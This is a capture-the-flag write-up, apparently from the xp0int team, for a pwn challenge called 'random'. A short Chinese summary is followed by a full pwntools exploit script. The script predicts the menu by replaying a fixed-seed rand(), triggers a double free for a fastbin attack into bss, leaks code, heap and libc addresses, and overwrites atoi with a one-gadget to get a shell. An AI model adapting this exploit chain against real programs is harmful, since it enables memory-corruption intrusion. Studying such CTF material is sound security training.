[Pwn] random - cpt.shao xp0int Posted on May 27 2019 在add函数选择添加明天的add以后链表出错,可以造一个double free。 本质上还是fastbin attack,但是不能随意控制操作,只能等伪随机数轮到相应的选项。 配合程序开始送的code段泄露,fastbin attack到bss段可以造任意写。 最后选择把atoi写成system,调用出错,写成onegadget 成功。
## exp.py
```python
# Exploit listing accompanying the writeup above (pwntools, Python 2 syntax:
# note the `print ops[::-1]` statement and str + "\x00" concatenation).
#
# Root causes as the author describes them: the menu operation offered each
# turn comes from libc rand() seeded with a constant, so the sequence can be
# replayed offline; the "add for tomorrow" path corrupts the note list and
# yields a double free (fastbin attack); a code-segment pointer is printed at
# startup, which gives the image base (presumably a PIE binary, since the
# base is recomputed from the leak below).
#
# Defender notes: never drive security-relevant decisions from rand() with a
# fixed seed; if the atoi pointer that gets overwritten is the GOT entry,
# full RELRO would have made it read-only; glibc >= 2.29 detects tcache
# double frees and 2.32 adds safe-linking, both of which break this chain.
#
# NOTE(review): `p` (the pwntools tube) and `bp` (a breakpoint helper) are
# never defined in this listing — presumably created outside the pasted
# snippet, so the script does not run exactly as printed.
from pwn import *
import re
import ctypes

# Load the challenge's libc with ctypes purely to mirror its rand() stream.
LIBC = ctypes.cdll.LoadLibrary('./libc-2.23.so')
libc = ELF('./libc-2.23.so')
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': ''}  # unused in the listing as shown
# context.log_level = "debug"
LIBC.srand(0)  # same constant seed the target uses, so rand() below predicts its menu
FUNC = ["add", "update", "delete", "view"]  # index = rand() % 4

# Thin I/O wrappers around the tube `p`.
def rc(x): return p.recv(x)
def ru(x): return p.recvuntil(x)
def se(x): return p.send(x)
def sl(x): return p.sendline(x)
def sea(a, b): return p.sendafter(a, b)
def sla(a, b): return p.sendlineafter(a, b)
def info_addr(tag, addr): return p.info(tag + ': {:#x}'.format(addr))

def name():
    # Seven 'a' bytes; the program echoes them back, which is used for the code leak.
    sla("name:", "a"*7)

def set_total(time):
    # Total number of days the program will run.
    sla("\n", str(time))

def per_day(time):
    # Number of operations offered on the current day (the prompt ends in "10)").
    sla("10)", str(time))

def gen_ops(time):
    # Replay glibc rand() to predict the next `time` menu options.
    # Printed reversed — the author's convention for matching the order
    # the program consumes them; not verified here.
    ops = []
    for i in range(time):
        r = LIBC.rand() % 4
        ops.append(FUNC[r])
    p.info("predict:")
    print ops[::-1]

def skip(time):
    # Decline `time` offered operations, logging which one was offered each
    # turn (content.split()[4] is the operation name within the prompt text).
    for i in range(time):
        content = ru("N)\n")
        sl("N")
        op = content.split()[4]
        p.warn("skip %s" % op)

def add(size, content, is_more=True):
    # Accept an "add" turn: size, then content; is_more answers the follow-up
    # "add for tomorrow?" prompt (Y is the path the writeup says corrupts the list).
    sla("N)", "Y")
    sla("note:", str(size))
    sea("note:", content)
    if is_more:
        sla("N)", "Y")
    else:
        sla("N)", "N")

def view(idx):
    sla("N)", "Y")
    sla("note:", str(idx))

def update(idx, content):
    sla("N)", "Y")
    sla("note:", str(idx))
    sla("note:", content)

def delete(idx):
    sla("N)", "Y")
    sla("note:", str(idx))

name()
# leak code: after echoing the 7-byte name the program prints 6 bytes of a
# code-segment pointer; 0xb90 is its offset from the image base in this binary.
ru("a"*7 + "\n")
leak_code = u64(rc(6) + "\x00\x00")
info_addr("leak_code", leak_code)
code = leak_code - 0xb90

set_total(20)
# day 1: nothing useful is offered, skip all five operations
gen_ops(5)
per_day(5)
skip(5)
# day 2
gen_ops(3)
per_day(3)
# first add
add(0x17, "\x00"*0x17, True)
skip(2)
per_day(0)
add(0x20, "\x00"*0x20, True)
skip(1)
# double free !!!  (two adds with per_day(0) in between exercise the
# "tomorrow" list corruption described in the writeup)
per_day(0)
add(0x17, "\x00"*0x17, True)
per_day(0)
add(0x17, "\x00"*0x17, True)
gen_ops(4)
per_day(4)
view(3)
# leak_heap: the freed chunk's fd pointer is printed back through view
content = ru("\nsuc")[1:7] + "\x00\x00"
leak_heap = u64(content)
heap = leak_heap - 0x30
info_addr("leak_heap", leak_heap)
info_addr("heap", heap)
skip(2)
# Redirect the fastbin fd into the binary's writable segment (offset from the
# author's analysis) so a later allocation lands there.
target = code + 0x203190
update(3, p64(target))
skip(1)
# NOTE(review): the page lost its indentation; the loop body is reconstructed
# as gen_ops/per_day/skip (skip whole days), with gen_ops(4)/per_day(4) after it.
for i in range(2):
    gen_ops(3)
    per_day(3)
    skip(3)
gen_ops(4)
per_day(4)
# bp(code + 0x11ac)
# The allocation returned from the fake chunk is filled so that note 2 points
# at the atoi entry (hence "atoi stub" below); 0x203090 is from the author's analysis.
payload = p64(code + 0x203090) + p64(0x8)
add(0x17, payload.ljust(0x17, "\x00"), False)
# atoi stub
view(2)
# leak libc: the printed atoi address gives the libc base
content = ru("\nsuc")[1:7] + "\x00\x00"
leak_libc = u64(content)
libc.address = leak_libc - libc.symbols['atoi']
info_addr("libc", libc.address)
skip(2)
gen_ops(2)
per_day(2)
# Offset specific to this libc-2.23 build; the writeup says system() was
# tried first and failed, so the one-gadget is used instead.
one_gadget = libc.address +0xf1147
update(2, p64(one_gadget))  # overwrite the atoi pointer; the next menu input triggers it
bp(code + 0x11ac)
# gdb.attach(p, gdbcmd)
p.interactive()
```